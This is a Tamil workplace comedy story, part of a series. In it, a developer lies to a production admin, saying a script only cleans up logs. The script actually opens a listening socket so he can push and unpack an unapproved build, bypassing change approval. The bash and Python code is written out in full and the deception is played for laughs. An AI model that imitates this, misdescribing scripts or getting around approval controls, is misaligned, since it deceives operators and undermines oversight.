.. title:: மின்னஞ்சல் முகவரியில்

*****************
மின்னஞ்சல் முகவரியில்
*****************

'this is actually using libcurl to connect with server [அம்மா: குட்டி உனக்கு மட்டும் ஏன்டா] and implements proxy objects to [அம்மா: எத்தனையோ பேர் ஜாதகத்த]', கெட்ட கனவை கண்டவன் போல் விழித்தபின், 'அய்யோ அம்மா, கனவுல கூட என்ன நிம்மதியா விட மாட்டியா,  இங்கயும் ஜாதகமா தாங்க முடியல!!', இப்படிப் புலம்புறவன் வேற யாரும் இல்லைங்க, இவன் தான் நம்ம ஹீரோ மதன், இவன மொக்க மதன்னும் கூப்டுவாங்க, பொண்ணுங்க கிட்ட பேசிப் பேசி இந்த பட்டப்பேரு வந்ததுன்னு தப்பா முடிவு எடுக்காதீங்க, மாட்னா நாள் கணக்கா லினக்ஸ் பத்தியும், ஓப்பன் சோர்ஸ் பற்றியும் பேசிப் பேசி காதுல இரத்தம் வர வைப்பான். அதனால இந்தப் பட்டம்.

கண் விழித்த பின் நேரத்தைப் பார்த்தால், மணி 11:30 AM, 'இன்னைக்கும் 11:30 மணியா?' மதன் முணுமுணுத்துக்கொண்டே அடித்துப் பிடித்து ஆட்டோவிற்குக் கப்பம் கட்டி 12:00 மணிக்கெல்லாம் தொழிற்சாலையை எப்படியோ அடைந்துவிட்டான் (மன்னிக்கவும், பணிபுரியும் பன்னாட்டு நிறுவனத்தை அடைந்துவிட்டான்) இப்படித்தான் பெரும்பாலும் இவன் காலைப்பொழுது அமையும்.

'வாடா நல்லவனே உன்னதான் வலைவீசித் தேடிக் கிட்டு இருக்காங்க', இது மதனின் கூட்டாளி (கொலீக்) உதய், 'ஏதாவது பெருசா?', இது மதன், 'புது பில்டு (build) சனிக்கிழமை புரொடக்ஷன் போகலடா, RFC ல ஏதோ பிரச்சனையாம், வெள்ளிக்கிழமை எவனுக்கோ வயித்தால போகுதுன்னு RFC ய அப்ரூவ் பண்ணாம சீக்கிரம் வீட்டுக்குப் போயிட்டானாம். நம்ம தல (ப்ராஜக்ட் மேனேஜர் லலித் என்கிற லலிதேஷ்) அவனவன் கிட்ட தொங்கிட்டு இருக்காரு, வெள்ளக்காரன் பக் பிக்ஸ் (bugfix) எல்லாம் லைவ் போகலையேன்னு இன்னும் கூட தூங்காம அவர புடிச்சு உலுக்கிட்டு இருக்கான். என்கிட்ட ஏதாவது பண்ண முடியுமான்னு கேட்டார், இன்னைக்கு முடிச்சிரலாம்னு சொல்லியிருக்கேன். நீ என்ன சொல்ற?', என்ற உதயிடம், 'புரடக்ஷன் அட்மின் என்ன சொல்ரான், காட்டுப்பய ஒத்தே போமாட்டானே, நாம பில்ட அவனுக்கு அனுப்புனா RFC இல்லாம புஷ் பண்றானாமா?'என்றான் மதன். 'அவன் ஒத்துழைச்சிருந்தா இந்நேரம் போயிட்டு இருக்குமே, வேற ஏதாவது?', உதயின் கேள்விக்கு, 'அவனோட டீம் இந்தியால இருக்குல்ல அவுங்கள்ல யாரையாவது ஒருத்தர புடிங்க, நமக்குத்தான் ப்ரொடக்‌ஷன் ஆக்ஸஸ் இல்ல, நம்ம தல ஸிஸ்டத்துல இருந்து இருக்குல்ல, அவர் சிஸ்டத்துக்கு நம்ம புது பிள்ட்  புஷ் பண்ணிடுவோம்', என்ற மதனை இடைமறித்து 'தம்பி, தலைக்கு ப்ரொடக்‌ஷன் வெறும் வெப் அட்மின் ஆக்ஸஸ் மட்டும்தான் இருக்கு, ssh/scp/sftp ஆஸ்ஸஸ் இல்லடா',என்றார் உதய். 'தெரியும், இருந்தாலும் புஷ் பண்ணிடலாம், பிரச்சனை இல்லை', என்றான் மதன்.
எப்படியோ ஒருவழியாக இந்திய அட்மின் டீமில் ஒருவரைப் பிடித்துவிட்டார் உதய் (சேட் மூலம்தான்), மதனும் புது பிள்டை அவன் ப்ராஜக்ட் மேனேஜர் சிஸ்டத்திற்கு அனுப்பிவிட்டான். இப்போது மதன், அட்மின் டீம் மெம்பர் இடம் பேச ஆரம்பிக்கிறான்,

:மதன்: Hey, good afternoon, just need some help executing a script in our production as pfinweb user to cleanup some huge logs, which is affecting our production web application's performance. [வணக்கம், எனக்கு உங்கள் உதவி தேவை, நான் கொடுக்கும் ஓர் script ஐ pfinweb எனும் பயனராக இயக்கவும், இது மிகப்பெரிய log பைல்களை சுத்தம் செய்து எங்கள் அப்ளிகேஷன் திறனை அதிகப்படுத்தும்.]

:அட்மின்: sure, you got all approvals, right? [கட்டாயம் செய்கிறேன், அப்ரூவல்கள் எல்லாம் வாங்கி விட்டீர்கள் அல்லவா?]

:மதன்: We already have approval which are valid till our production support duration, they covered these kind of tasks. [ஏற்கனவே எங்கள் புரொடக்ஷன் சப்போர்ட் பணிகளில் இவ்வகையான செயல்களுக்கு அனுமதி அளிக்கப்பட்டுள்ளது]

:அட்மின்: Alright, send the script, we will execute. [சரி, script ஐ அனுப்பி வையுங்கள், அதை ப்ரொடக்‌ஷனில் இயக்குகிறோம்]

:மதன்: Thanks, please restart our application once the script complete and the restart should be before 9:00 AM EDT [நன்றி, மேலும் இந்த script முடிந்தவுடன் எங்கள் அப்ளிகேஷனை ரீஸ்டார்ட் செய்யவும், 09:00 EDT மனிக்குள் முடிக்கவும்]

:அட்மின்: roger that [சரி]

அதன்பின், மதன் கீழே உள்ள script ஐ அட்மினுக்கு அனுப்பிவைத்தான்.

.. code-block:: bash

   #!/bin/bash
   
   TIMESTAMP=$(date +'%Y%m%d%H%M%S')
   LOGFILE='/tmp/cleanup.bash.${TIMESTAMP}.log'
   exec >${LOGFILE} 2>&1
   set -x
   
   OURWEBDOMAIN='pfinweb'
   HOSTNAME=$(hostname -s)
   OUTFILE='${OURWEBDOMAIN}.tar.gz'
   cd /var/www/'${HOSTNAME}'/
   mv '${OURWEBDOMAIN}' '${OURWEBDOMAIN}.backup.${TIMESTAMP}'
   echo 'Ready for cleanup :) !!'
   mailx -s '${LOGFILE}' madhan.k@bigservicecompany.com uday.l@bigservicecompany.com lalitesh.r@bigservicecompany.com < '${LOGFILE}'
   python <<EOF
   import socket
   mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   mysock.bind(('${HOSTNAME}', 33220))
   mysock.listen(1)
   (con, addr) = mysock.accept()
   print addr
   outfile = open('${OUTFILE}', 'w')
   while True:
       buf = con.recv(4098)
       outfile.write(buf)
       print 'cleaned %d bytes'%(len(buf))
       if not buf: break
   con.close()
   mysock.close()
   outfile.close()
   EOF
   echo 'Finished log cleanup :) .!!'
   tar xvzf '${OUTFILE}'
   echo 'Job done!! Kick a2s!!'
   mailx -s '${LOGFILE}' madhan.k@bigservicecompany.com uday.l@bigservicecompany.com lalitesh.r@bigservicecompany.com < '${LOGFILE}'

அட்மினும் இந்த script ஐ ப்ரொடக்‌ஷன் சிஸ்டத்தில் இயக்கினார், உடனே, மதனுக்கு இந்த script ஐ 'Ready for cleanup :) !!' என்று மின்னஞ்சல் அனுப்பியது, இந்த மின்னஞ்சல் pfinwebny01zone43.bigservicecompany.com என்ற ஹாஸ்ட் நேமில் (hostname) இருந்து வந்திருந்தது. மதன் பிறகு தன் ப்ராஜக்ட் மேனேஜர் சிஸ்டத்திலிருந்து கீழ்க்கண்ட பைத்தான் கட்டளைகளைக் கொடுத்தான்.

.. code-block:: console

   $ python
   Python 2.7.3 (default, Mar 24 2013, 06:03:34)
   [GCC 4.6.3] on linux2
   Type 'help', 'copyright', 'credits' or 'license' for more information.
   >>> import socket
   >>> mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   >>> mysock.connect(('pfinwebny01zone43.bigservicecompany.com', 33220))
   >>> infile = open('pfinweb.tar.gz', 'r')
   >>> for buf in infile: mysock.send(buf)
   >>> mysock.close()
   >>> infile.close()
   >>> [ctrl-d]
   $

மேற்கண்ட python கட்டளைகள் முடிந்தவுடன், மதனுக்கு மற்றொரு மின்னஞ்சல் வந்தது, அதில் 'Job done!! Kick a2s!!' என்று இருந்தது. இந்த மின்னஞ்சல்கள் உதய் மற்றும் லலிதேஷுக்கும் சென்றிருந்தது, அதைப் பார்த்த உதய் புன்னகையுடன் பேசத் தொடங்கினார்,

'முடிச்சிட்ட போல, எப்படிடா அந்த 33220 போர்ட் உன்னால் ஆக்ஸஸ் பண்ண முடியும்னு கண்டுபிடிச்ச? சப்போஸ் பேசிவ் (Passive) பயர்வால் இருந்து இருந்துச்சுன்னா என்ன பண்ணி இருப்ப?', என்று உதய் கேட்க, 'எல்லாம் ஒரு குருட்டு தைரியம் தான், கொஞ்ச நாள் முன்னாடி நம்ம சைட் டவுன் ஆச்சுல்ல, அப்ப என்ன நடக்குதுன்னு பார்க்க நம்ம வெப்சைட்ட curl வழியா கனெக்ட் பண்ண டிரை பண்ணேன், அப்ப connection refused அப்படின்னு வந்துச்சு, பேசிவ் பயர்வாலா இருந்து ஒரு போர்ட்ல எதுவும் லிசன் பண்ணலைன்னா என்னோட கனெக்ட் பாக்கெட்ஸ் எல்லாம் டிராப் ஆகி இருக்கும், connection refused வந்திருக்காது, அப்பத்தான் தெரிஞ்சிக்கிட்டேன் நம்ப ஆப்பீஸ்ல எந்த சர்வருக்கும் பேசிவ் பயர்வால் எனேபிள் பண்ணலைன்னு, அதனாலத்தான் தைரியமா ஒரு சின்ன பைத்தான் TCP சர்வர அந்த ஸ்க்ரிப்ட்ல எம்பட் பண்ணேன். அதுவும் கரைக்டா ஒர்க் ஆகிடிச்சு. எப்படியோ முடிஞ்சது, ஆனா, அப்ரூவல் இல்லாம எப்படி பிள்ட டிப்லாய் (deploy) பண்ணீங்கன்னு க்ளைன்ட் கேட்டா என்ன பண்றது?', என்றவனை, 'கவலப்படாதடா அப்ரூவல் மேட்டர நான் பாத்துக்கறேன் நீங்க தைரியமா புஷ் பண்ணுங்க சொன்னதே அந்த வெள்ளைக் காரன் தான்', என்று மதன் வயிற்றில் பாலை வார்த்தார்.

நேரம் மாலை 05:45 IST, உருப்படியாக ஒரு வேலையை முடித்த திருப்தியில் மதன் இருக்க, யாரோ சேட்டில் கூப்பிடுவது தெரிந்தது, அது அந்த script ஐ இயக்கிய அட்மின், பதற்றத்துடன் மதன் டைப் செய்ய ஆரம்பித்தான்,

:அட்மின்: Hello are you there? [இருக்கின்றீர்களா?]

:மதன்: Yes, which way I can help you? [இருக்கேன், உங்களுக்கு எந்த வகையில் உதவனும்?]

:அட்மின்: I'm new to linux, coming from windows background, I saw your script, nothing understandable, especially 'Job Done!! Kick a2s!!', could you please explain what it is? [நான் லினக்ஸிற்கு புதிது, விண்டோஸ் அட்மினாக இருந்து லினக்ஸிற்கு மாறியுள்ளேன், உங்கள் script ஐப் பார்த்தேன், ஒன்றும் புரியவில்லை, குறிப்பாக, 'Job done!! Kick a2s!!', விளக்கமுடியுமா?]

மதனுக்கு சிரிப்பதா இல்லை அழுவதா என்று தெரியவில்லை,

:மதன்: you really don't know the meaning?? [உண்மையிலேயே விளங்கவில்லையா?]

:அட்மின்: trust me, I don't know [நம்புங்கள்]

மதன் சேட் செய்துகொண்டிருக்கும் அட்மினின் இமெயில் முகவரியை பார்த்தான், karthik.a.lakshman@bigservicecompany.com என்று இருந்தது, எனவே அட்மின் ஒரு ஆண் என்று எண்ணித் தொடர்ந்தான்,

:madhan: karthik dude, that sentence is a joke, you need to understand the whole script to know the real meaning of that joke, if you come to know that, you will try to kill me immediately, but this is not at all aimed at you. believe me, this is targeted to your project manager [கார்த்திக் நண்பா, அது ஒரு கெட்ட வார்த்தை ஜோக், அதோட அர்த்தம் தெரியனும்னா, முதல்ல அந்த script புரியனும், அது புரிஞ்சா, என்ன நீ கொல்ல வருவ, ஆனா, இந்த ஜோக் உன்ன பத்தி இல்ல, உன் ப்ராஜக்ட் மேனேஜர் பத்தி, தப்பா நினைக்காதே]

:karthik.a: hmm whatever in that script, I need to learn, and you seems to be the right person to learn, is it ok to call you in my free time?? [ அந்த script ல என்ன இருக்குன்னு எனக்குத் தெரிஞ்சாகணும், கத்துக்க நீங்கதான் சரியான ஆளு, நான் சும்மா இருக்கும்போது உங்களுக்கு கால் பண்ணலாமா?]

:madhan: sure [கட்டாயமா]

:karthik.a: by the way, I'm not 'karthik', I'm karthika and we both seems to be in the same office, (noticed your desk number, starts with 044, our company have only once office in chennai) maybe I'll come directly to your desk If I really want :) [அப்புறம், என் பெயர் 'கார்த்திக்' அல்ல, 'கார்த்திகா', அது மட்டுமில்லாம, நாம ஒரே இடத்தில் வேலை செய்கிறோம் (உங்க மேஜை எண் 044 ல ஆரம்பமாகுது, அதை வச்சுக் கண்டுபிடிச்சேன், அதனால, தேவைப்பட்டால் உங்கள நேர்ல வந்து சந்திப்பேன் ;) ]

'அடிங் கொப்பம் மவளே பேர karthik.a.lakshman ன்னு வச்சு ஏமாத்திப் புட்டியேடி. சிரிக்கி' இது மதனின் மனசாட்சி, ஆனால், அவன் டைப் செய்தது,

:madhan: good, great to know that!! you are always welcome [அப்படியா, ரொம்ப சந்தோஷங்க!! கண்டிப்பா வாங்க]

:karthika: do you understand tamil? [உங்களுக்குத் தமிழ் தெரியுமா?]

:madhan: magalir ani thalaiviku vanakkam :) [மகளிர் அணித் தலைவிக்கு வணக்கம் :) ]

:karthika: thamasu :), anyway ippavae lateu, nan kalamburaen, appuram parpom, bye!! [தமாசு :) ,சரி இப்பவே லேட்டு, நான் கிளம்புறேன், அப்புறம் பார்ப்போம், பாய்!!]

'சார்ப்பா 6:30 ஆனா கழட்டிக்கோங்கடி, நாங்க மட்டும் நைட்டெல்லாம் கண்ணு முழிக்கனும் இப்பத்தான் ஆரம்பிச்சேன் அதுக்குள்ள கிளம்பிட்டியா' மறுபடியும் மனசாட்சி, ஆனால் மதன் டைப் செய்தது,

:madhan: ok, bye!! [சரி, பாய்!!]

.. note:: *வாசகர் குறிப்பு*

   *இனிமேல், மதன், கார்த்திகா இடையேயான மின் உரையாடல் (chat), தமிழில் மட்டுமே வழங்கப்படும், ஏனெனில் அவர்கள் ஆங்கிலத்தில் டைப் செய்தாலும் தமிழ் Phonetic இல் டைப் செய்து இருப்பார்கள் என்று கருதவும்.*

**தொடரும்..**
